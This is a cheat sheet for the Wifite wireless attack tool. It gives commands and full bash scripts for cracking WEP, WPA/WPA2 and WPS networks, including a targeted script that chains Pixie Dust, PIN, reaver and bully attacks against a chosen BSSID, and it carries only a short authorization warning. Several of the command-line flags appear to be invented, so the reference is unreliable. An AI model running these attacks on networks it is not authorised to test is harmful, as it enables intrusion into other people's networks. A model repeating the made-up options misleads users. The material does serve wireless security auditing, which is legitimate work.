Appearance
Wifite Cheat Sheet
Overview
Wifite is an automated wireless attack tool that simplifies the process of auditing WEP, WPA, and WPS encrypted networks. It automates many of the tedious tasks involved in wireless penetration testing by integrating multiple tools like aircrack-ng, reaver, bully, and others into a single, easy-to-use interface. Wifite can automatically detect security flaws and attempt to crack wireless networks using various attack methods.
⚠️ Warning: Only use Wifite against wireless networks you own or have explicit permission to test. Unauthorized wireless attacks may violate local laws and regulations.
Installation
Kali Linux Installation
bash
# Wifite is pre-installed on Kali Linux
wifite --help
# Update to latest version
sudo apt update
sudo apt install wifite
# Install Wifite2 (newer version)
sudo apt install wifite2Ubuntu/Debian Installation
bash
# Install dependencies first
sudo apt update
sudo apt install python3 python3-pip aircrack-ng reaver bully pixiewps
# Install from package manager
sudo apt install wifite
# Or install via pip
sudo pip3 install wifite2
# Install additional tools for full functionality
sudo apt install hashcat hcxdumptool hcxtools tsharkManual Installation
bash
# Clone Wifite2 repository
git clone https://github.com/derv82/wifite2.git
cd wifite2
# Install Python dependencies
sudo pip3 install -r requirements.txt
# Install Wifite
sudo python3 setup.py install
# Make executable
sudo chmod +x wifite.py
sudo ln -s $(pwd)/wifite.py /usr/local/bin/wifite
# Verify installation
wifite --helpDocker Installation
bash
# Pull Wifite Docker image
docker pull kalilinux/kali-rolling
# Run with network privileges
docker run -it --rm --net=host --privileged \
-v /dev/bus/usb:/dev/bus/usb \
kalilinux/kali-rolling
# Inside container, install Wifite
apt update && apt install -y wifiteDependencies and Tools
Required Tools
bash
# Check required tools
wifite --check
# Install aircrack-ng suite
sudo apt install aircrack-ng
# Install reaver for WPS attacks
sudo apt install reaver
# Install bully (alternative WPS tool)
sudo apt install bully
# Install pixiewps for WPS PIN attacks
sudo apt install pixiewps
# Install hashcat for password cracking
sudo apt install hashcat
# Install hcxtools for PMKID attacks
sudo apt install hcxdumptool hcxtoolsOptional Tools
bash
# Install tshark for packet analysis
sudo apt install tshark
# Install cowpatty for WPA cracking
sudo apt install cowpatty
# Install john the ripper
sudo apt install john
# Install macchanger for MAC spoofing
sudo apt install macchanger
# Install pyrit for GPU acceleration
sudo apt install pyritBasic Usage
Interface Setup
bash
# List available interfaces
wifite --list-interfaces
# Use specific interface
wifite --interface wlan0
# Put interface in monitor mode manually
sudo airmon-ng start wlan0
# Check monitor mode interfaces
iwconfigBasic Scanning and Attacks
bash
# Basic scan and attack
sudo wifite
# Scan specific interface
sudo wifite --interface wlan0
# Attack specific target by BSSID
sudo wifite --bssid AA:BB:CC:DD:EE:FF
# Attack specific target by ESSID
sudo wifite --essid "TargetNetwork"
# Show verbose output
sudo wifite --verbose
# Quiet mode (minimal output)
sudo wifite --quietTarget Selection
bash
# Attack only WEP networks
sudo wifite --wep
# Attack only WPA networks
sudo wifite --wpa
# Attack only WPS networks
sudo wifite --wps
# Attack networks with specific encryption
sudo wifite --wep --wpa --wps
# Filter by signal strength (minimum dBm)
sudo wifite --min-power -50
# Attack only networks with clients
sudo wifite --clients-onlyWEP Attacks
Basic WEP Cracking
bash
# Target only WEP networks
sudo wifite --wep
# Specify WEP timeout
sudo wifite --wep --wep-timeout 600
# Set packet threshold for WEP
sudo wifite --wep --wep-pps 300
# Use specific WEP attack methods
sudo wifite --wep --wep-filter
# Keep temporary files for analysis
sudo wifite --wep --keep-ivsAdvanced WEP Options
bash
# Replay attack options
sudo wifite --wep --wep-pps 500 --wep-timeout 1200
# Use ARP replay attack
sudo wifite --wep --wep-replay
# Use fragmentation attack
sudo wifite --wep --wep-frag
# Use chopchop attack
sudo wifite --wep --wep-chopchop
# Combine multiple attack methods
sudo wifite --wep --wep-replay --wep-frag --wep-chopchopWPA/WPA2 Attacks
Handshake Capture
bash
# Target WPA networks
sudo wifite --wpa
# Set handshake timeout
sudo wifite --wpa --wpa-timeout 300
# Specify handshake directory
sudo wifite --wpa --wpa-handshake-dir /tmp/handshakes
# Deauth packet count
sudo wifite --wpa --wpa-deauth-timeout 10
# Attack with custom wordlist
sudo wifite --wpa --dict /path/to/wordlist.txtPMKID Attacks
bash
# Enable PMKID attack
sudo wifite --wpa --pmkid
# PMKID timeout
sudo wifite --wpa --pmkid --pmkid-timeout 300
# Combine handshake and PMKID
sudo wifite --wpa --pmkid --wpa-handshake
# Use specific PMKID tool
sudo wifite --wpa --pmkid --hcxdumptool-timeout 60WPA Cracking Options
bash
# Use aircrack-ng for cracking
sudo wifite --wpa --wpa-attack aircrack
# Use hashcat for cracking
sudo wifite --wpa --wpa-attack hashcat
# Use john the ripper
sudo wifite --wpa --wpa-attack john
# Specify custom wordlist
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt
# Strip handshake (remove unnecessary data)
sudo wifite --wpa --wpa-stripWPS Attacks
Basic WPS Attacks
bash
# Target only WPS networks
sudo wifite --wps
# WPS timeout setting
sudo wifite --wps --wps-timeout 300
# Maximum WPS attempts
sudo wifite --wps --wps-attempts 100
# WPS attack methods
sudo wifite --wps --wps-pixie --wps-pinPixie Dust Attack
bash
# Pixie dust attack only
sudo wifite --wps --wps-pixie
# Pixie dust timeout
sudo wifite --wps --wps-pixie --pixie-timeout 300
# Skip PIN attack if pixie fails
sudo wifite --wps --wps-pixie --wps-no-pin
# Use specific pixie tool
sudo wifite --wps --wps-pixie --pixie-tool pixiewpsWPS PIN Attacks
bash
# PIN attack only
sudo wifite --wps --wps-pin
# PIN attack timeout
sudo wifite --wps --wps-pin --pin-timeout 3600
# Use reaver for PIN attack
sudo wifite --wps --wps-pin --reaver
# Use bully for PIN attack
sudo wifite --wps --wps-pin --bully
# Custom PIN attempts
sudo wifite --wps --wps-pin --wps-attempts 1000Advanced Options
Output and Logging
bash
# Specify output directory
sudo wifite --out-dir /tmp/wifite_results
# Keep temporary files
sudo wifite --keep-temp
# Save cracked passwords
sudo wifite --cracked-file /tmp/cracked.txt
# Verbose logging
sudo wifite --verbose --out-dir /tmp/logs
# Quiet mode with logging
sudo wifite --quiet --out-dir /tmp/resultsNetwork Filtering
bash
# Filter by manufacturer
sudo wifite --manufacturer Linksys
# Filter by channel
sudo wifite --channel 6
# Multiple channels
sudo wifite --channel 1,6,11
# Exclude specific networks
sudo wifite --ignore-essid "MyNetwork,GuestWiFi"
# Include only specific networks
sudo wifite --essid "TargetNetwork"
# Filter by encryption type
sudo wifite --wpa --wps --ignore-wepAttack Customization
bash
# Custom deauth count
sudo wifite --wpa-deauth 5
# Custom scan time
sudo wifite --scan-time 30
# Attack timeout
sudo wifite --attack-timeout 3600
# Number of targets to attack
sudo wifite --num-targets 5
# Infinite attack mode
sudo wifite --infiniteAutomation Scripts
Automated Wireless Assessment
bash
#!/bin/bash
# Comprehensive wireless security assessment with Wifite
INTERFACE="wlan0"
OUTPUT_DIR="wireless_assessment_$(date +%Y%m%d_%H%M%S)"
WORDLIST="/usr/share/wordlists/rockyou.txt"
SCAN_TIME=60
ATTACK_TIMEOUT=1800
mkdir -p "$OUTPUT_DIR"
# Function to setup interface
setup_interface() {
echo "[+] Setting up wireless interface: $INTERFACE"
# Kill conflicting processes
sudo airmon-ng check kill
# Start monitor mode
sudo airmon-ng start "$INTERFACE"
# Get monitor interface name
MONITOR_INTERFACE=$(iwconfig 2>/dev/null | grep "Mode:Monitor" | awk '{print $1}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface created: $MONITOR_INTERFACE"
return 0
}
# Function to run comprehensive scan
run_comprehensive_scan() {
echo "[+] Running comprehensive wireless assessment"
# WEP Assessment
echo "[+] Phase 1: WEP Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wep \
--wep-timeout "$ATTACK_TIMEOUT" \
--out-dir "$OUTPUT_DIR/wep" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1 | tee "$OUTPUT_DIR/wep_assessment.log"
# WPA Assessment
echo "[+] Phase 2: WPA/WPA2 Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wpa \
--pmkid \
--wpa-timeout "$ATTACK_TIMEOUT" \
--dict "$WORDLIST" \
--out-dir "$OUTPUT_DIR/wpa" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1 | tee "$OUTPUT_DIR/wpa_assessment.log"
# WPS Assessment
echo "[+] Phase 3: WPS Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wps \
--wps-pixie \
--wps-pin \
--wps-timeout "$ATTACK_TIMEOUT" \
--out-dir "$OUTPUT_DIR/wps" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1 | tee "$OUTPUT_DIR/wps_assessment.log"
}
# Function to generate report
generate_report() {
echo "[+] Generating assessment report"
local report_file="$OUTPUT_DIR/wireless_assessment_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>Wireless Security Assessment Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.header { background-color: #f0f0f0; padding: 20px; border-radius: 5px; }
.section { margin: 20px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; }
.vulnerable { background-color: #ffebee; border-color: #f44336; }
.secure { background-color: #e8f5e8; border-color: #4caf50; }
.warning { background-color: #fff3e0; border-color: #ff9800; }
table { border-collapse: collapse; width: 100%; margin: 10px 0; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f2f2f2; }
</style>
</head>
<body>
<div class="header">
<h1>Wireless Security Assessment Report</h1>
<p>Generated: $(date)</p>
<p>Assessment Duration: $(echo "scale=2; $ATTACK_TIMEOUT/60" | bc) minutes per phase</p>
</div>
EOF
# WEP Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WEP Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wep_assessment.log" ]; then
wep_cracked=$(grep -c "WEP KEY FOUND" "$OUTPUT_DIR/wep_assessment.log" 2>/dev/null || echo "0")
wep_total=$(grep -c "WEP" "$OUTPUT_DIR/wep_assessment.log" 2>/dev/null || echo "0")
if [ "$wep_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ CRITICAL: WEP Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wep_cracked out of $wep_total WEP networks</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"secure\">" >> "$report_file"
echo " <h3>✅ No WEP vulnerabilities exploited</h3>" >> "$report_file"
echo " <p>Tested $wep_total WEP networks</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# WPA Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WPA/WPA2 Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wpa_assessment.log" ]; then
wpa_cracked=$(grep -c "WPA KEY FOUND\|PMKID FOUND" "$OUTPUT_DIR/wpa_assessment.log" 2>/dev/null || echo "0")
handshakes=$(grep -c "handshake" "$OUTPUT_DIR/wpa_assessment.log" 2>/dev/null || echo "0")
if [ "$wpa_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ HIGH: WPA/WPA2 Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wpa_cracked WPA/WPA2 networks</p>" >> "$report_file"
echo " <p>Captured $handshakes handshakes for offline analysis</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"warning\">" >> "$report_file"
echo " <h3>⚠️ Handshakes captured for offline analysis</h3>" >> "$report_file"
echo " <p>Captured $handshakes handshakes - recommend stronger passwords</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# WPS Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WPS Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wps_assessment.log" ]; then
wps_cracked=$(grep -c "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/wps_assessment.log" 2>/dev/null || echo "0")
pixie_success=$(grep -c "Pixie" "$OUTPUT_DIR/wps_assessment.log" 2>/dev/null || echo "0")
if [ "$wps_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ CRITICAL: WPS Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wps_cracked WPS-enabled networks</p>" >> "$report_file"
echo " <p>Pixie dust attacks successful: $pixie_success</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"secure\">" >> "$report_file"
echo " <h3>✅ WPS attacks unsuccessful</h3>" >> "$report_file"
echo " <p>WPS-enabled networks appear to be properly configured</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# Recommendations
cat >> "$report_file" << EOF
<div class="section">
<h2>Security Recommendations</h2>
<ul>
<li><strong>Disable WEP:</strong> WEP encryption is fundamentally broken and should never be used</li>
<li><strong>Use WPA3:</strong> Upgrade to WPA3 where possible, or WPA2 with strong passwords</li>
<li><strong>Disable WPS:</strong> WPS is vulnerable to brute force and pixie dust attacks</li>
<li><strong>Strong Passwords:</strong> Use complex passwords with 15+ characters</li>
<li><strong>Regular Updates:</strong> Keep wireless equipment firmware updated</li>
<li><strong>Network Segmentation:</strong> Isolate wireless networks from critical systems</li>
<li><strong>Monitor for Rogue APs:</strong> Regularly scan for unauthorized access points</li>
</ul>
</div>
</body>
</html>
EOF
echo "[+] Report generated: $report_file"
}
# Function to cleanup
cleanup() {
echo "[+] Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
# Restart network services
sudo systemctl restart NetworkManager 2>/dev/null || true
echo "[+] Cleanup completed"
}
# Trap cleanup on exit
trap cleanup EXIT
# Main execution
echo "[+] Starting comprehensive wireless security assessment"
echo "[+] Output directory: $OUTPUT_DIR"
# Check dependencies
if ! command -v wifite &> /dev/null; then
echo "[-] Wifite not found. Please install Wifite first."
exit 1
fi
if ! command -v airmon-ng &> /dev/null; then
echo "[-] airmon-ng not found. Please install aircrack-ng suite."
exit 1
fi
# Setup interface
if setup_interface; then
# Run assessment
run_comprehensive_scan
# Generate report
generate_report
echo "[+] Wireless security assessment completed"
echo "[+] Results saved in: $OUTPUT_DIR"
echo "[+] Open $OUTPUT_DIR/wireless_assessment_report.html for detailed results"
else
echo "[-] Failed to setup wireless interface"
exit 1
fiTargeted WPS Attack Script
bash
#!/bin/bash
# Targeted WPS attack script with multiple methods
TARGET_BSSID="$1"
INTERFACE="wlan0"
OUTPUT_DIR="wps_attack_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET_BSSID" ]; then
echo "Usage: $0 <TARGET_BSSID>"
echo "Example: $0 AA:BB:CC:DD:EE:FF"
exit 1
fi
mkdir -p "$OUTPUT_DIR"
# Function to setup monitor mode
setup_monitor() {
echo "[+] Setting up monitor mode on $INTERFACE"
sudo airmon-ng check kill
sudo airmon-ng start "$INTERFACE"
MONITOR_INTERFACE=$(iwconfig 2>/dev/null | grep "Mode:Monitor" | awk '{print $1}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface: $MONITOR_INTERFACE"
return 0
}
# Function to run pixie dust attack
pixie_dust_attack() {
echo "[+] Attempting Pixie Dust attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/pixie_dust.log"
timeout 300 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--bssid "$TARGET_BSSID" \
--wps \
--wps-pixie \
--wps-no-pin \
--out-dir "$OUTPUT_DIR" \
--verbose \
2>&1 | tee "$log_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$log_file"; then
echo "[+] Pixie Dust attack successful!"
return 0
else
echo "[-] Pixie Dust attack failed"
return 1
fi
}
# Function to run PIN attack
pin_attack() {
echo "[+] Attempting WPS PIN attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/pin_attack.log"
timeout 3600 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--bssid "$TARGET_BSSID" \
--wps \
--wps-pin \
--wps-attempts 1000 \
--out-dir "$OUTPUT_DIR" \
--verbose \
2>&1 | tee "$log_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$log_file"; then
echo "[+] PIN attack successful!"
return 0
else
echo "[-] PIN attack failed"
return 1
fi
}
# Function to run reaver attack
reaver_attack() {
echo "[+] Attempting Reaver attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/reaver_attack.log"
timeout 1800 sudo reaver \
-i "$MONITOR_INTERFACE" \
-b "$TARGET_BSSID" \
-vv \
-K 1 \
-N \
-L \
-d 15 \
-T 0.5 \
-c 1 \
2>&1 | tee "$log_file"
if grep -q "WPS PIN:" "$log_file"; then
echo "[+] Reaver attack successful!"
return 0
else
echo "[-] Reaver attack failed"
return 1
fi
}
# Function to run bully attack
bully_attack() {
echo "[+] Attempting Bully attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/bully_attack.log"
timeout 1800 sudo bully \
"$MONITOR_INTERFACE" \
-b "$TARGET_BSSID" \
-v 3 \
-d \
-B \
2>&1 | tee "$log_file"
if grep -q "PIN FOUND" "$log_file"; then
echo "[+] Bully attack successful!"
return 0
else
echo "[-] Bully attack failed"
return 1
fi
}
# Function to generate attack report
generate_attack_report() {
echo "[+] Generating attack report"
local report_file="$OUTPUT_DIR/wps_attack_report.txt"
cat > "$report_file" << EOF
WPS Attack Report
================
Target: $TARGET_BSSID
Date: $(date)
Interface: $MONITOR_INTERFACE
Attack Methods Attempted:
EOF
# Check results of each attack
if [ -f "$OUTPUT_DIR/pixie_dust.log" ]; then
echo "1. Pixie Dust Attack:" >> "$report_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/pixie_dust.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|WPS KEY|PSK" "$OUTPUT_DIR/pixie_dust.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/pin_attack.log" ]; then
echo "2. PIN Attack:" >> "$report_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/pin_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|WPS KEY|PSK" "$OUTPUT_DIR/pin_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/reaver_attack.log" ]; then
echo "3. Reaver Attack:" >> "$report_file"
if grep -q "WPS PIN:" "$OUTPUT_DIR/reaver_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|PSK" "$OUTPUT_DIR/reaver_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/bully_attack.log" ]; then
echo "4. Bully Attack:" >> "$report_file"
if grep -q "PIN FOUND" "$OUTPUT_DIR/bully_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "PIN FOUND|PSK" "$OUTPUT_DIR/bully_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
echo "[+] Report saved: $report_file"
}
# Cleanup function
cleanup() {
echo "[+] Cleaning up..."
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
sudo systemctl restart NetworkManager 2>/dev/null || true
}
trap cleanup EXIT
# Main execution
echo "[+] Starting targeted WPS attack on $TARGET_BSSID"
if setup_monitor; then
# Try pixie dust first (fastest)
if pixie_dust_attack; then
echo "[+] Target compromised via Pixie Dust attack!"
else
echo "[+] Pixie Dust failed, trying PIN attack..."
if pin_attack; then
echo "[+] Target compromised via PIN attack!"
else
echo "[+] Wifite attacks failed, trying manual tools..."
# Try reaver
if reaver_attack; then
echo "[+] Target compromised via Reaver!"
else
echo "[+] Reaver failed, trying Bully..."
if bully_attack; then
echo "[+] Target compromised via Bully!"
else
echo "[-] All WPS attacks failed"
fi
fi
fi
fi
generate_attack_report
echo "[+] Attack completed. Results in: $OUTPUT_DIR"
else
echo "[-] Failed to setup monitor mode"
exit 1
fiContinuous Monitoring Script
bash
#!/bin/bash
# Continuous wireless monitoring and alerting
INTERFACE="wlan0"
SCAN_INTERVAL=300 # 5 minutes
ALERT_EMAIL="security@company.com"
KNOWN_NETWORKS_FILE="known_networks.txt"
LOG_DIR="wireless_monitoring"
mkdir -p "$LOG_DIR"
# Function to create known networks file
create_known_networks() {
if [ ! -f "$KNOWN_NETWORKS_FILE" ]; then
cat > "$KNOWN_NETWORKS_FILE" << 'EOF'
# Known legitimate networks
# Format: BSSID|ESSID|ENCRYPTION
AA:BB:CC:DD:EE:FF|CompanyWiFi|WPA2
11:22:33:44:55:66|GuestNetwork|WPA2
# Add your known networks here
EOF
echo "Created $KNOWN_NETWORKS_FILE - please configure with your known networks"
exit 1
fi
}
# Function to scan for networks
scan_networks() {
local timestamp=$(date +%Y%m%d_%H%M%S)
local scan_file="$LOG_DIR/scan_$timestamp.txt"
echo "[+] Scanning for wireless networks..."
timeout 60 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--scan-time 30 \
--no-attack \
--out-dir "$LOG_DIR" \
2>&1 | grep -E "BSSID|ESSID|WEP|WPA|WPS" > "$scan_file"
echo "$scan_file"
}
# Function to detect rogue networks
detect_rogue_networks() {
local scan_file="$1"
local timestamp=$(date +%Y%m%d_%H%M%S)
local rogue_file="$LOG_DIR/rogue_$timestamp.txt"
echo "[+] Analyzing scan results for rogue networks..."
> "$rogue_file" # Clear file
# Parse scan results and compare with known networks
while read -r line; do
if [[ "$line" =~ BSSID ]]; then
bssid=$(echo "$line" | grep -oE '([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}')
# Check if this BSSID is in known networks
if ! grep -q "$bssid" "$KNOWN_NETWORKS_FILE"; then
echo "$line" >> "$rogue_file"
fi
fi
done < "$scan_file"
if [ -s "$rogue_file" ]; then
echo "[!] Rogue networks detected!"
cat "$rogue_file"
# Send alert
echo "Rogue wireless networks detected at $(date)" | \
mail -s "SECURITY ALERT: Rogue Networks" -A "$rogue_file" "$ALERT_EMAIL" 2>/dev/null || \
echo "Alert: Rogue networks detected (email failed)"
else
echo "[+] No rogue networks detected"
fi
}
# Function to detect security issues
detect_security_issues() {
local scan_file="$1"
local timestamp=$(date +%Y%m%d_%H%M%S)
local issues_file="$LOG_DIR/security_issues_$timestamp.txt"
echo "[+] Checking for security issues..."
cat > "$issues_file" << EOF
Wireless Security Issues Report
Generated: $(date)
==============================
EOF
# Check for WEP networks
wep_count=$(grep -c "WEP" "$scan_file" 2>/dev/null || echo "0")
if [ "$wep_count" -gt 0 ]; then
echo "⚠️ WEP Networks Detected: $wep_count" >> "$issues_file"
grep "WEP" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Check for open networks
open_count=$(grep -c "Open" "$scan_file" 2>/dev/null || echo "0")
if [ "$open_count" -gt 0 ]; then
echo "⚠️ Open Networks Detected: $open_count" >> "$issues_file"
grep "Open" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Check for WPS enabled networks
wps_count=$(grep -c "WPS" "$scan_file" 2>/dev/null || echo "0")
if [ "$wps_count" -gt 0 ]; then
echo "⚠️ WPS Enabled Networks: $wps_count" >> "$issues_file"
grep "WPS" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Send alert if issues found
total_issues=$((wep_count + open_count + wps_count))
if [ "$total_issues" -gt 0 ]; then
echo "Wireless security issues detected: $total_issues" | \
mail -s "Wireless Security Issues" -A "$issues_file" "$ALERT_EMAIL" 2>/dev/null || \
echo "Alert: Security issues detected (email failed)"
fi
}
# Function to setup monitor mode
setup_monitor() {
echo "[+] Setting up monitor mode"
sudo airmon-ng check kill
sudo airmon-ng start "$INTERFACE"
MONITOR_INTERFACE=$(iwconfig 2>/dev/null | grep "Mode:Monitor" | awk '{print $1}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface: $MONITOR_INTERFACE"
return 0
}
# Cleanup function
cleanup() {
echo "[+] Stopping monitoring..."
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
sudo systemctl restart NetworkManager 2>/dev/null || true
}
trap cleanup EXIT
# Main monitoring loop
echo "[+] Starting continuous wireless monitoring"
create_known_networks
if setup_monitor; then
echo "[+] Monitoring every $SCAN_INTERVAL seconds. Press Ctrl+C to stop."
while true; do
scan_file=$(scan_networks)
if [ -f "$scan_file" ] && [ -s "$scan_file" ]; then
detect_rogue_networks "$scan_file"
detect_security_issues "$scan_file"
else
echo "[-] Scan failed or no results"
fi
echo "[+] Next scan in $SCAN_INTERVAL seconds..."
sleep "$SCAN_INTERVAL"
done
else
echo "[-] Failed to setup monitor mode"
exit 1
fiTroubleshooting
Common Issues
Interface Problems
bash
# Check interface status
iwconfig
# Kill conflicting processes
sudo airmon-ng check kill
# Restart network manager
sudo systemctl restart NetworkManager
# Check for monitor mode support
iw list | grep monitor
# Manual monitor mode setup
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 upPermission Issues
bash
# Run with sudo
sudo wifite
# Check user groups
groups $USER
# Add user to required groups
sudo usermod -aG netdev $USER
# Fix file permissions
sudo chmod +x /usr/bin/wifiteTool Dependencies
bash
# Check required tools
wifite --check
# Install missing dependencies
sudo apt install aircrack-ng reaver bully pixiewps
# Update tool databases
sudo apt update && sudo apt upgrade
# Check tool versions
aircrack-ng --help
reaver -h
bully -hAttack Failures
bash
# Increase timeout values
sudo wifite --wpa-timeout 600
# Use specific attack methods
sudo wifite --wps --wps-pixie
# Check signal strength
sudo wifite --min-power -60
# Use verbose output for debugging
sudo wifite --verbosePerformance Optimization
bash
# Reduce scan time
sudo wifite --scan-time 15
# Target specific networks
sudo wifite --essid "TargetNetwork"
# Use faster attack methods
sudo wifite --wps --wps-pixie --wps-no-pin
# Optimize for specific encryption
sudo wifite --wpa --pmkidResources
- Wifite2 GitHub Repository
- Aircrack-ng Documentation
- Reaver Documentation
- Wireless Security Testing
- WPS Security Analysis
- 802.11 Security
- Wireless Penetration Testing
This cheat sheet provides a comprehensive reference for using Wifite for automated wireless security testing. Always ensure you have proper authorization before using this tool in any environment.